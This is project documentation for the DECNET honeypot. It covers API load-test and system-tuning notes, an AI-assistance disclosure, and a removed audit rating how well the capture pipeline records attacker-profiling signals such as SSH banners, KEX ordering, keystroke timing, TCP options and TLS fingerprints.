- **Single-core pinning**: ~46 RPS with p95 near two minutes. Interesting
|
||||
as a "physics floor" datapoint — not a production config.
|
||||
|
||||
Top endpoints by volume: `/api/v1/attackers`, `/api/v1/deckies`,
|
||||
`/api/v1/bounty`, `/api/v1/logs/histogram`, `/api/v1/config`,
|
||||
`/api/v1/health`, `/api/v1/auth/login`, `/api/v1/logs`.
|
||||
|
||||
Notes on tuning:
|
||||
|
||||
- **Python 3.14 is currently a no-go for the API server.** Under heavy
|
||||
concurrent async load the reworked 3.14 GC segfaults inside
|
||||
`mark_all_reachable` (observed in `_PyGC_Collect` during pending-GC
|
||||
on 3.14.3). Stick to Python 3.11–3.13 until upstream stabilises.
|
||||
- Router-level TTL caches on hot count/stats endpoints (`/stats`,
|
||||
`/logs` count, `/attackers` count, `/bounty`, `/logs/histogram`,
|
||||
`/deckies`, `/config`) collapse concurrent duplicate work onto a
|
||||
single DB hit per window — essential to reach this RPS on one worker.
|
||||
- Turning off request tracing (`DECNET_TRACING=false`) is the next
|
||||
free headroom: tracing was still on during the run above.
|
||||
- On SQLite, `DECNET_DB_POOL_PRE_PING=false` skips the per-checkout
|
||||
`SELECT 1`. On MySQL, keep it `true` — network disconnects are real.
|
||||
|
||||
#### System tuning: open file limit
|
||||
|
||||
Under heavy load (500+ concurrent users), the server will exhaust the default Linux open file limit (`ulimit -n`), causing `OSError: [Errno 24] Too many open files`. Most distros default to **1024**, which is far too low for stress testing or production use.
|
||||
|
||||
**Before running stress tests:**
|
||||
|
||||
```bash
|
||||
# Check current limit
|
||||
ulimit -n
|
||||
|
||||
# Bump for this shell session
|
||||
ulimit -n 65536
|
||||
```
|
||||
|
||||
**Permanent fix** — add to `/etc/security/limits.conf`:
|
||||
|
||||
```
|
||||
* soft nofile 65536
|
||||
* hard nofile 65536
|
||||
```
|
||||
|
||||
Or for systemd-managed services, add `LimitNOFILE=65536` to the unit file.
|
||||
|
||||
> This applies to production deployments too — any server handling hundreds of concurrent connections needs a raised file descriptor limit.
|
||||
|
||||
# AI Disclosure
|
||||
|
||||
This project has been made with lots, and I mean lots of help from AIs. While most of the design was made by me, most of the coding was done by AI models.
|
||||
|
||||
Nevertheless, this project will be kept under high scrutiny by humans.
|
||||
|
||||
@@ -1,566 +0,0 @@
|
||||
# DECNET Capture Pipeline — Attacker-Profiling Signal Audit
|
||||
|
||||
**Date**: 2026-04-22
|
||||
**Scope**: v1 capture readiness for post-v1 profiler extraction
|
||||
**Methodology**: End-to-end verification (emission → transport → storage) for each signal against active code paths.
|
||||
|
||||
---
|
||||
|
||||
## Executive Summary
|
||||
|
||||
**Capture Status by Category**:
|
||||
|
||||
| Category | Captured | Partial | Not Captured | n/a |
|
||||
|----------|----------|---------|--------------|-----|
|
||||
| Session Environment | 0 | 1 | 3 | 0 |
|
||||
| Keystroke/Human | 0 | 2 | 6 | 2 |
|
||||
| SSH Transport | 2 | 2 | 2 | 0 |
|
||||
| Network/TCP | 3 | 2 | 5 | 0 |
|
||||
| TLS/L7 | 2 | 2 | 1 | 0 |
|
||||
| Aggregated/Derived | 0 | 0 | 5 | 0 |
|
||||
| **TOTAL** | **7** | **9** | **22** | **2** |
|
||||
|
||||
**Critical Pre-v1 Gaps** (blockers if signals are roadmap-committed):
|
||||
|
||||
1. **KEX algorithm ordering** — HASSH hash is stored, but raw `kex_algorithms` string is only emitted to syslog, not persisted to DB. Future extractor must parse syslog archives.
|
||||
2. **Per-keystroke timing** — Asciinema v2 `"i"` events with `t` timestamps are written to day-shard files on disk, but they are never ingested into the database. Extraction requires a filesystem polling + parsing path.
|
||||
3. **TCP options order** — Captured in PCAP + sniffer logs (`options_sig`), but `options_sig` is a rolled-up signature string, not the raw per-connection sequence.
|
||||
4. **Terminal size (COLS×ROWS)** — Not captured from pty-req at all; would require SSH protocol-level interception.
|
||||
5. **SSH client version** — Server-side only sees RFC 4253 banner; full version string would require TLS cert inspection or prober modification.
|
||||
|
||||
**Biggest ROI capture improvements** (cheap, high-value):
|
||||
|
||||
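1. Add `ssh_client_banner` column to Attacker table — capture the client's SSH-2.0-* identification string (sent in plaintext at connection start, before key exchange; it is not part of pty-req).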
|
||||
2. Ingest asciinema keystroke timing into new `SessionProfile` table (v2 roadmap already designs this).
|
||||
3. Store raw KEX algorithm lists in `AttackerBehavior.kex_order_raw` (MEDIUMTEXT) instead of relying on syslog dedup.
|
||||
|
||||
---
|
||||
|
||||
## Per-Signal Classification
|
||||
|
||||
### Per-Session Environment (SessionProfile candidates)
|
||||
|
||||
#### TERM environment variable
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH server can read TERM from pty-req; emitted in syslog by `emit_capture.py` if implemented.
|
||||
- **Current path**: Not found in active code path. Check `decnet/templates/ssh/emit_capture.py` or syslog bridge.
|
||||
- **Missing**: Database column in a `SessionProfile` table; no structured ingestion.
|
||||
- **Cheap fix**: Modify SSH syslog bridge to emit `session_event` with `term=<value>`. Create `SessionProfile` table with `session_term` TEXT column.
|
||||
- **Priority**: V2 backlog (nice-to-have for human vs. automation, low discriminative power).
|
||||
|
||||
#### LANG / LC_ALL
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Server-side locale is baked into container image, not attacker-controlled. Attacker's client locale is not visible over SSH.
|
||||
- **Priority**: defer (non-capturable from server vantage point).
|
||||
|
||||
#### SSH client version string (full SSH-2.0-OpenSSH_9.2p1…)
|
||||
- **Status**: `partial`
|
||||
- **Where**: RFC 4253 banner string is transmitted in plaintext before encryption. Sniffer could capture it from TCP stream; prober `hassh.py` captures server banner (lines 58–101), not client.
|
||||
- **Missing**: Client-side banner capture. Sniffer would need TCP stream reconstruction to pluck the SSH banner from the raw payload.
|
||||
- **Cheap fix**: Extend sniffer to parse SSH banners from TCP stream (the banner is sent in plaintext before SSH encryption begins); emit `ssh_client_banner` event. Store in Attacker.`ssh_client_banners` (JSON list).
|
||||
- **Priority**: v1 blocker if client-profiling is committed. Currently partial via TLS fingerprint fallback.
|
||||
|
||||
#### Terminal size (COLS × ROWS)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: SSH pty-req extension carries `terminal mode` (COLS, ROWS, speeds); server-side sshd parses this but does not log it by default. Would require patching sshd or intercepting at the protocol layer.
|
||||
- **Missing**: No access to pty-req payload without protocol-level instrumentation.
|
||||
- **Cheap fix**: Patch SSH entrypoint to log pty-req to syslog before accepting the request (requires custom OpenSSH build).
|
||||
- **Priority**: V2 backlog (interesting for typing-space reconstruction, but not a blocker).
|
||||
|
||||
---
|
||||
|
||||
### Per-Session, Keyboard/Human (SessionProfile candidates)
|
||||
|
||||
#### Per-keystroke timing (t in asciinema "i" events)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sessrec pipeline (`decnet/templates/ssh/sessrec/`) writes asciinema v2 day-shards with per-keystroke `"i"` (input) events carrying `t` (timestamp in seconds since session start). Files on disk: `/var/lib/decnet/session_recordings/<decky>/<date>.json` (or similar).
|
||||
- **Missing**: No ingestion into database. Extractors must read asciinema files from filesystem and parse the `"i"` event stream post-hoc.
|
||||
- **Cheap fix**: Ingest keystroke timing stream into new `SessionProfile` table (design already in DEVELOPMENT_V2.md). Add job to parse day-shard files on rotation and compute IKI moments, burst ratio, etc.
|
||||
- **Priority**: v1 blocker if keystroke dynamics is roadmap-committed. Data exists but not queryable.
|
||||
|
||||
#### Control-character stream (backspace, ^W, ^U, ^C, ^D, arrows, tab)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Asciinema captures every keystroke as UTF-8/control byte in `"i"` events. Raw byte sequence is preserved.
|
||||
- **Missing**: Same as above — files on disk, no DB ingestion. Future extractor can parse control bytes from the `"data"` field of each `"i"` event.
|
||||
- **Cheap fix**: Same as keystroke timing — ingest asciinema events and compute `kd_ctrl_*` rates in SessionProfile.
|
||||
- **Priority**: v2 (depends on SessionProfile schema).
|
||||
|
||||
#### Inter-command think time (prompt-return to next-command-start gap)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires prompt boundary detection in the asciinema stream (heuristic: line ending in `$` or `#` + pause > 100ms). No active code marks prompts.
|
||||
- **Missing**: Prompt-boundary markers in asciinema. Would require ML or regex-based post-processing.
|
||||
- **Cheap fix**: Add prompt-regex configuration + marker injection during sessrec playback, or post-hoc analysis over asciinema.
|
||||
- **Priority**: V2 (interesting but requires heuristic or attacker-side annotation).
|
||||
|
||||
#### Pause before sensitive commands
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires command-boundary detection (typing a full command, then detecting gap before Enter). Asciinema captures this timing, but no code marks command boundaries.
|
||||
- **Missing**: Command-line parsing + gap detection logic.
|
||||
- **Cheap fix**: Off-line analysis: parse `"i"` events, detect Enter (`\r`), measure gap before Enter. Correlate with command content from `"o"` (output) events.
|
||||
- **Priority**: V2 backlog (post-extraction analysis; interesting for psychological profiling).
|
||||
|
||||
#### Command n-grams
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH service logs individual commands to syslog when pty input is detected. Attacker.`commands` JSON array stores seen commands (but coarse-grained per service/decky, not per-session).
|
||||
- **Missing**: Per-session, per-command sequencing. No n-gram bigrams/trigrams computed.
|
||||
- **Cheap fix**: Parse asciinema `"i"` + `"o"` stream to extract full command lines, store as JSON list in SessionProfile.`cmd_sequence` or new `SessionCommand` table.
|
||||
- **Priority**: V2 (foundation for command chaining fingerprint).
|
||||
|
||||
#### Flag preferences (ls -la vs ls -al, ps -ef vs ps aux)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Asciinema records the **typed** command line exactly, but no code parses flag ordering or normalizes commands for pattern comparison.
|
||||
- **Missing**: Canonical command parsing + flag-order extraction.
|
||||
- **Cheap fix**: Off-line: regex-parse commands from asciinema, extract flag sequences, compute n-grams over flag positions.
|
||||
- **Priority**: V2 (cheap post-processing, good human-vs-tool separator).
|
||||
|
||||
#### Typo patterns (suod, sl)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Asciinema records corrected command line after backspacing, not the raw keystrokes with typos visible.
|
||||
- **Example**: typing `suod`, pressing `<backspace>` twice, then typing `do` shows as `sudo` in `"o"` output; the intermediate typos are **visible** in the `"i"` event stream but require careful keystroke-by-keystroke parsing.
|
||||
- **Missing**: Raw keystroke stream parsing to detect backspace/correction patterns.
|
||||
- **Cheap fix**: Parse `"i"` events, reconstruct line state keystroke-by-keystroke, log (typed_text, final_text) pairs to detect corrections.
|
||||
- **Priority**: V2 (unique human fingerprint, but requires manual asciinema parsing).
|
||||
|
||||
#### Editor choice (vi/vim/nano/ed)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Command launch (`vi`, `nano`, `ed`) is visible in asciinema `"i"` + `"o"` stream and captured in Attacker.`commands`.
|
||||
- **Missing**: No aggregation of editor invocations or time-in-editor statistics.
|
||||
- **Cheap fix**: Post-process commands, count editor launches, extract editor type. Could add to AttackerBehavior.`preferred_editor` or new SessionProfile.`editor_used`.
|
||||
- **Priority**: V2 (behavioral signal, low priority).
|
||||
|
||||
#### Shell history usage (!!, !$, ^old^new, fc)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Command input stream captures the actual invocation (if attacker types `!!`, it's visible in `"i"`). Output `"o"` shows the expanded command.
|
||||
- **Missing**: No parsing of history expansion syntax; requires post-processing to identify `!` / `^` patterns.
|
||||
- **Cheap fix**: Regex-scan asciinema input for shell history operators; count occurrences.
|
||||
- **Priority**: V2 (interesting tool-chain signal, but low volume).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, SSH Transport (AttackerBehavior candidates)
|
||||
|
||||
#### HASSH / HASSHServer
|
||||
- **Status**: `captured`
|
||||
- **Where**: Prober (`decnet/prober/hassh.py`) computes HASSHServer fingerprint; stored as `Attacker.fingerprints` JSON list (generic bounty store). Also emitted to syslog by prober worker.
|
||||
- **Note**: Roadmap says `[x]` (captured); verified in code at lines 244–252 of `hassh.py`.
|
||||
- **Storage**: `Attacker.fingerprints` (JSON list of `{type, value, ...}` dicts); not per-attacker-behavior, but queryable.
|
||||
- **Priority**: ✓ captured; v2: consider normalizing to `AttackerBehavior.hassh_server` for faster lookup.
|
||||
|
||||
#### KEX algorithm preference ORDER (beyond HASSH hash)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer logs raw `kex_algorithms`, `encryption_s2c`, `mac_s2c`, `compression_s2c` strings to syslog in `tls_session` and `tcp_syn_fingerprint` events (fingerprint.py lines 240–252).
|
||||
- **Missing**: Stored in **syslog only**, not in DB. Attacker table has `fingerprints` (bounty store) but no dedicated `kex_order_raw` column.
|
||||
- **Path to recovery**: Read syslog archives and parse `kex_algorithms` field. But this is not queryable at scale.
|
||||
- **Cheap fix**: Add `Attacker.kex_order_raw` (MEDIUMTEXT, JSON string list) and `kd_kex_order_hash` (similar to digraph simhash). Populate during sniffer event ingestion.
|
||||
- **Priority**: v1 blocker if KEX ordering is committed to roadmap (currently only hash stored, raw data must be re-parsed from syslog).
|
||||
|
||||
#### Public key comment field
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: SSH key comment is part of the OpenSSH wire format (only transmitted if key auth is used). Server-side sshd does not log it by default; would require PAM/auth hook instrumentation.
|
||||
- **Missing**: No interception of public key authentication payloads.
|
||||
- **Cheap fix**: Patch SSH server to emit auth_pubkey event with key comment extracted from wire format. Or use `net.ssh` library instrumentation.
|
||||
- **Priority**: V2 backlog (valuable for key reuse fingerprinting, but rare).
|
||||
|
||||
#### Private key type advertised (Ed25519 / RSA / ECDSA)
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH transport carries key type in the public key authentication message. Sniffer cannot decode this (traffic is encrypted once key exchange completes with SSH_MSG_NEWKEYS). Server-side sshd doesn't log it.
|
||||
- **Missing**: Requires either passive PCAP of SSH-TRANSPORT (not available; encrypted) or server-side auth hook.
|
||||
- **Cheap fix**: Patch sshd to emit `auth_pubkey_type` event during authentication.
|
||||
- **Priority**: V2 (interesting but lower signal than key comment).
|
||||
|
||||
#### Agent forwarding requested?
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Agent forwarding is requested with an `auth-agent-req@openssh.com` channel request on the session channel, after authentication. Encrypted after KEX.
|
||||
- **Missing**: Would require decrypting SSH transport or instrumenting sshd auth hook.
|
||||
- **Cheap fix**: Sshd can detect `SSH_AUTH_SOCK` or SSH_AGENT_FWD service request; add to syslog.
|
||||
- **Priority**: V2 (useful for lateral-movement detection).
|
||||
|
||||
#### Channel multiplexing pattern
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH service logs each command separately. Channel open/close events could be tracked, but no code currently does.
|
||||
- **Missing**: Per-session channel state machine (open channels, their types, lifetime).
|
||||
- **Cheap fix**: Instrument sshd or use SSH_MSG_CHANNEL_OPEN events in syslog to track simultaneous channels.
|
||||
- **Priority**: V2 (rare; most attackers use sequential commands).
|
||||
|
||||
#### SSH_CLIENT / SSH_CONNECTION environment variables
|
||||
- **Status**: `captured`
|
||||
- **Where**: SSH server **always** sets `SSH_CLIENT` and `SSH_CONNECTION` in the child shell. Server-side user code (bashrc, commands) can read them. If attacker runs `echo $SSH_CLIENT`, it's visible in asciinema output.
|
||||
- **Missing**: No **automatic** logging of these vars. Requires parsing asciinema for intentional queries or patching sshd to emit them.
|
||||
- **Cheap fix**: Patch SSH PAM or auth hook to log `SSH_CLIENT` on successful auth. Or parse asciinema for `echo $SSH_*` commands.
|
||||
- **Priority**: V2 (low value; mostly redundant with src_ip already in logs).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, Network/Transport (AttackerBehavior candidates)
|
||||
|
||||
#### TCP timestamp clock skew (Kohno 2005)
|
||||
- **Status**: `partial`
|
||||
- **Where**: PCAP contains TCP timestamps (if present). Sniffer code extracts MSS, window size, options (fingerprint.py lines 77–94). TCP options include timestamp flag (`has_timestamps`).
|
||||
- **Missing**: Raw timestamp values (`opt_value` for "Timestamp" in scapy) are NOT extracted. Only boolean `has_timestamps` flag is stored. To compute clock skew, need timestamp values across multiple packets.
|
||||
- **Path to recovery**: Raw PCAP analysis (if PCAPs are retained on disk). Each TCP packet has `[TCP option: Timestamp x, y]` which can be parsed post-hoc.
|
||||
- **Cheap fix**: Extend sniffer to extract timestamp sequence numbers and RTT deltas. Store as per-flow timing summary in `tcp_flow_timing` event (which already captures flow metrics).
|
||||
- **Priority**: V2 (requires PCAP or extended sniffer capture; useful for OS fingerprinting).
|
||||
|
||||
#### TCP ISN generator characteristics
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: ISN is visible in PCAP (TCP seq number on SYN). Sniffer code tracks flow seqs for retransmit detection (line 850) but does not extract the initial SYN seq across multiple connections to analyze ISN patterns.
|
||||
- **Missing**: No per-connection ISN logging. Would need to roll up ISN sequences across multiple SYNs to the same port.
|
||||
- **Cheap fix**: On every SYN, log `syn_seq` in `tcp_syn_fingerprint` event. Post-hoc analysis can compute randomness metrics.
|
||||
- **Priority**: V2 backlog (weak signal; ISN randomization is standard on modern OS).
|
||||
|
||||
#### TCP options ordering in SYN
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer extracts `options_sig` (line 87) via `_extract_options_order()` from scapy TCP options. This is a **signature string** (e.g., `"MSS,WScale,SAckOK,Timestamp"`).
|
||||
- **Missing**: The signature is **aggregated**; we don't store the raw per-packet ordering. Also, `options_sig` is deduplicated in logs (only one event per unique signature per dedup window).
|
||||
- **Path to recovery**: Raw PCAP analysis or re-parsing sniffer logs to extract the signature. But the signature is a good enough feature for OS fingerprinting.
|
||||
- **Cheap fix**: Store `tcp_fingerprint` JSON in AttackerBehavior with raw options list (not just signature). Current schema (models.py lines 174–177) only stores aggregated `{window, wscale, mss, options_sig}`.
|
||||
- **Priority**: v1 improvement (low effort, already have options_sig; add raw list).
|
||||
|
||||
#### Initial congestion window ramp-up
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires detailed TCP state machine tracking (SYN, SYN-ACK, ACK sequence with packet sizes). Sniffer tracks `packets` count and `bytes` total per flow (lines 844–868), but not per-packet sequence or ACK-clock dynamics.
|
||||
- **Missing**: Per-packet payload sizes and ACK timing.
|
||||
- **Cheap fix**: Extend `tcp_flow_timing` event to include per-packet sizes (as JSON list) or CWND estimation from ACK patterns.
|
||||
- **Priority**: V2 backlog (very niche; useful for Reno vs. Cubic vs. BBR detection, but rare in honeypot context).
|
||||
|
||||
#### Retransmit timing and backoff
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer tracks `retransmits` count per flow (lines 873–877, 922). Emitted in `tcp_flow_timing` event. No **timing** of retransmits, only count.
|
||||
- **Missing**: Timing deltas between retransmit pairs (RTO, exponential backoff pattern).
|
||||
- **Path to recovery**: Raw PCAP; sequence numbers in `tcp_flow_timing` are not logged.
|
||||
- **Cheap fix**: Extend event to include retransmit timing deltas (list of RTOs).
|
||||
- **Priority**: V2 (useful for network condition inference; low value on honeypots).
|
||||
|
||||
#### MTU / path-MTU discovery behavior
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer tracks per-flow byte counts (line 868); can infer effective MSS from packet sizes. TCP fingerprint includes extracted MSS (lines 77–94, emitted in `tcp_syn_fingerprint`).
|
||||
- **Missing**: No multi-flow MTU tracking or ICMP fragmentation-needed response detection. Would require ICMP processing.
|
||||
- **Cheap fix**: Log ICMP unreachable (frag needed) events separately; correlate with TCP flows to infer PMTUD behavior.
|
||||
- **Priority**: V2 backlog (VPN detection is interesting but niche).
|
||||
|
||||
#### Packet pacing (microsecond-resolution egress timing)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Sniffer computes mean/min/max inter-arrival time in milliseconds (lines 904–906), not microseconds. Modern pacing requires sub-millisecond precision.
|
||||
- **Missing**: Sniffer uses `time.monotonic()` (typically millisecond granularity on Linux); would need OS-level timing hooks or PCAP with hardware timestamps.
|
||||
- **Cheap fix**: Upgrade sniffer to use PCAP timestamps (pcap.ts_resolution) if available; log microsecond-resolution inter-packet gaps.
|
||||
- **Priority**: V2 backlog (requires infrastructure upgrade; marginal value on honeypots).
|
||||
|
||||
#### Window scaling multipliers
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer extracts `wscale` from TCP options (line 80); stored in `tcp_fingerprint` JSON and emitted in `tcp_syn_fingerprint` event.
|
||||
- **Storage**: AttackerBehavior.`tcp_fingerprint` (JSON: `{window, wscale, mss, ...}`); queryable.
|
||||
- **Priority**: ✓ captured (sufficient for OS fingerprinting and congestion algorithm inference).
|
||||
|
||||
#### ECN negotiation
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: ECN is signaled via TCP flags (CWR, ECE) and the SYN's TCP options. Scapy's TCP layer does not expose ECN flags in the options extraction.
|
||||
- **Missing**: No code to parse ECN negotiation from TCP header.
|
||||
- **Cheap fix**: Extend TCP fingerprint extraction to check for ECN flag bits.
|
||||
- **Priority**: V2 backlog (rarely used; low value).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, L7 (TLS/HTTP)
|
||||
|
||||
#### TLS fingerprint (JA3/JA4)
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer fingerprint engine computes JA3/JA3S/JA4/JA4S (lines 565–662); emitted in syslog and stored in `Attacker.fingerprints` (bounty store).
|
||||
- **Storage**: Logs are queryable; fingerprints stored as JSON in bounty table (generic).
|
||||
- **Roadmap**: `[x]` JA3/JA3S, `[x]` JA4+. Verified in code.
|
||||
- **Priority**: ✓ captured (good).
|
||||
|
||||
#### TLS session resumption behavior
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer extracts resumption mechanisms (session_ticket, PSK, early_data, session_id) in `_session_resumption_info()` (lines 675–689). Emitted in `tls_client_hello` event.
|
||||
- **Storage**: Logged to syslog; `Attacker.fingerprints` stores resumption=`[mechanism list]`.
|
||||
- **Priority**: ✓ captured (good).
|
||||
|
||||
#### HTTP/2 SETTINGS frame ordering + values
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: HTTP/2 is encrypted (after TLS handshake). Sniffer cannot see plaintext SETTINGS frames.
|
||||
- **Missing**: Would require decryption (not viable passively) or attacker-side TLS instrumentation.
|
||||
- **Cheap fix**: Instrument HTTP/2 services (h2c, HTTP/2 over plain TCP on rare deployments) or use TLS key log for offline analysis.
|
||||
- **Priority**: defer (not capturable from passive vantage point).
|
||||
|
||||
#### HTTP/2 stream prioritization
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Encrypted in TLS.
|
||||
- **Missing**: Same as above.
|
||||
- **Priority**: defer (not capturable).
|
||||
|
||||
#### HTTP header ordering
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Inside encrypted TLS. Sniffer cannot see plaintext HTTP headers.
|
||||
- **Missing**: Would require server-side HTTP request logging (not implemented).
|
||||
- **Cheap fix**: Instrument HTTP service to log raw header order in syslog.
|
||||
- **Priority**: V2 (useful for bot/tool detection, but requires service-level capture).
|
||||
|
||||
#### Cookie handling behavior (expiry, domain scope)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Encrypted TLS + requires HTTP state machine tracking (Set-Cookie responses vs. Cookie requests).
|
||||
- **Missing**: Would need server-side HTTP middleware or browser instrumentation.
|
||||
- **Cheap fix**: Add cookie jar logging to HTTP service (track which attacker cookies were accepted, rejected, resent).
|
||||
- **Priority**: V2 (behavioral signal; interesting but niche).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, Aggregated/Derived (would live in new `AttackerAggregate` table)
|
||||
|
||||
#### Time-of-day activity distribution (chronotyping)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Log entries have `timestamp` (datetime). All events are timestamped. Can compute hour-of-day histogram post-hoc.
|
||||
- **Missing**: No aggregation table or computed features. Would live in new AttackerAggregate.
|
||||
- **Cheap fix**: Batch job: group events by attacker + hour-of-day, compute distribution histogram. Store as JSON or new table.
|
||||
- **Priority**: V2 (simple aggregation; good for clustering).
|
||||
|
||||
#### Session duration distribution
|
||||
- **Status**: `partial`
|
||||
- **Where**: SessionProfile schema (DEVELOPMENT_V2.md) includes `session_duration_s`. Asciinema files are per-decky-per-day, so duration can be computed.
|
||||
- **Missing**: No SessionProfile table yet; no aggregation of durations across sessions.
|
||||
- **Cheap fix**: Implement SessionProfile table + compute per-attacker duration histogram in AttackerAggregate.
|
||||
- **Priority**: V2 (depends on SessionProfile; good for behavioral clustering).
|
||||
|
||||
#### Recon-to-action ratio
|
||||
- **Status**: `partial`
|
||||
- **Where**: Profiler already computes recon vs. exfil phase sequencing (behavioral.py lines 52–62, 188–191). Stored in `AttackerBehavior.phase_sequence` (JSON: `{recon_end, exfil_start, latency}`).
|
||||
- **Missing**: No per-attacker ratio column in AttackerAggregate. Would be simple division: `recon_events / exfil_events` (recon-to-action, matching the signal name; guard against a zero denominator).
|
||||
- **Cheap fix**: Compute ratio in profiler job; store in new AttackerAggregate or as extension to AttackerBehavior.
|
||||
- **Priority**: V2 (low effort; useful for threat level scoring).
|
||||
|
||||
#### Lateral movement style
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires graph traversal (attacker hopping between deckies). Correlation engine (correlation/engine.py) should track this, but no explicit "lateral movement style" feature (sequential vs. parallel, target selection heuristic).
|
||||
- **Missing**: No code analyzing lateral movement pattern (which deckies were touched, in what order, dwell time per decky).
|
||||
- **Cheap fix**: Extend CorrelationEngine to build per-attacker decky traversal graph; compute metrics (average dwell time, fan-out ratio, revisit frequency).
|
||||
- **Priority**: V2 (interesting; requires traversal graph extraction from correlation engine).
|
||||
|
||||
#### Persistence-first vs. exfil-first
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires semantic tagging of events (is this persistence activity? exfil activity?). Profiler has `EXFIL_EVENT_TYPES` (behavioral.py lines 59–62) but no persistence catalog.
|
||||
- **Missing**: No code to classify persistence attempts (cron jobs, reverse shells, privilege escalation).
|
||||
- **Cheap fix**: Add PERSISTENCE_EVENT_TYPES list; compute persistence_start vs. exfil_start timestamps; store in AttackerBehavior or AttackerAggregate.
|
||||
- **Priority**: V2 (requires event taxonomy; valuable for threat classification).
|
||||
|
||||
#### Tool-chain ordering
|
||||
- **Status**: `partial`
|
||||
- **Where**: Profiler logs tool guesses in AttackerBehavior.`tool_guesses` (line 183, behavioral.py lines 76–105). Tools are matched by beacon timing + header patterns.
|
||||
- **Missing**: No **ordering** — tools are listed but not sequenced by first-appearance time.
|
||||
- **Cheap fix**: Sort tool_guesses by first event timestamp; store as ordered list. Compute tool transition graph (tool A → tool B over time).
|
||||
- **Priority**: V2 (interesting; small extension to existing tool attribution).
|
||||
|
||||
#### Error-response psychology
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires analyzing how attacker reacts to failures (e.g., retry frequency after auth failure, command error recovery). Would need per-command success/failure tracking.
|
||||
- **Missing**: No error-categorization in logs; would need service-level event typing (auth_failure vs. auth_success, exec_error vs. exec_success).
|
||||
- **Cheap fix**: Extend service events to include success/failure indicators; compute attacker error-response metrics (retry rate, time-to-recovery, behavior change after error).
|
||||
- **Priority**: V2 backlog (niche; good for human vs. bot discrimination).
|
||||
|
||||
---
|
||||
|
||||
## Table Recommendations
|
||||
|
||||
### `AttackerBehavior` — Current & Recommended Additions
|
||||
|
||||
**Currently captured** (verified in models.py lines 161–194):
|
||||
- `tcp_fingerprint` (JSON) — window, wscale, mss, options_sig
|
||||
- `timing_stats` (JSON) — mean/median/stdev/min/max IAT
|
||||
- `phase_sequence` (JSON) — recon_end, exfil_start latency
|
||||
- `tool_guesses` (JSON list)
|
||||
- `beacon_interval_s`, `beacon_jitter_pct`
|
||||
- `behavior_class` (beaconing | interactive | scanning | …)
|
||||
|
||||
**Recommended additions for v1 (pre-v2, no schema bump)**:
|
||||
- `kex_order_raw` (MEDIUMTEXT, JSON list) — raw KEX algorithm strings from HASSH
|
||||
- `tls_fingerprints_full` (MEDIUMTEXT, JSON) — full JA3/JA4 raw strings, not just hashes
|
||||
- `ssh_client_banners` (MEDIUMTEXT, JSON list) — capture from TCP stream
|
||||
|
||||
**Reserved for v2**:
|
||||
- See SessionProfile below.
|
||||
|
||||
### `SessionProfile` — New Table (v2 roadmap in DEVELOPMENT_V2.md)
|
||||
|
||||
Design is already specified (lines 71–104). Implement in v1 as empty table + stubbed write path, ready for feature extraction post-v1.
|
||||
|
||||
**Columns** (from DEVELOPMENT_V2.md):
|
||||
- `sid` (TEXT PK)
|
||||
- `log_id` (FK to logs)
|
||||
- `schema_version` (INT, required for federation gossip)
|
||||
- Timing features: `kd_iki_mean`, `kd_iki_stdev`, `kd_iki_p50`, `kd_iki_p95`, `kd_enter_latency_p50`, `kd_enter_latency_p95`
|
||||
- Ratio features: `kd_burst_ratio`, `kd_think_ratio`
|
||||
- Control-char rates: `kd_ctrl_backspace`, `kd_ctrl_wkill`, `kd_ctrl_ukill`, `kd_ctrl_abort`, `kd_ctrl_eof`, `kd_arrow_rate`, `kd_tab_rate`
|
||||
- `kd_digraph_simhash` (BLOB, 8 bytes)
|
||||
- Derived: `total_keystrokes`, `session_duration_s`, `created_at`
|
||||
|
||||
**Note**: All keystroke-timing values are derivable from existing asciinema day-shard files on disk. Implement ingestion job in v2 (not v1 blocker).
|
||||
|
||||
### `AttackerAggregate` — New Table (v2+)
|
||||
|
||||
Columns (suggested):
|
||||
- `attacker_uuid` (PK, FK to attackers)
|
||||
- `activity_dist_by_hour` (JSON) — histogram of event counts by UTC hour
|
||||
- `session_duration_dist` (JSON) — percentiles of session durations
|
||||
- `recon_to_action_ratio` (REAL)
|
||||
- `lateral_movement_graph` (JSON) — decky traversal (src → dst edges with dwell times)
|
||||
- `tool_sequence` (JSON list) — tools in chronological order
|
||||
- `is_persistent` (BOOL) — persistence activity detected?
|
||||
- `updated_at` (TIMESTAMP)
|
||||
|
||||
---
|
||||
|
||||
## Full Per-Signal Capture Table
|
||||
|
||||
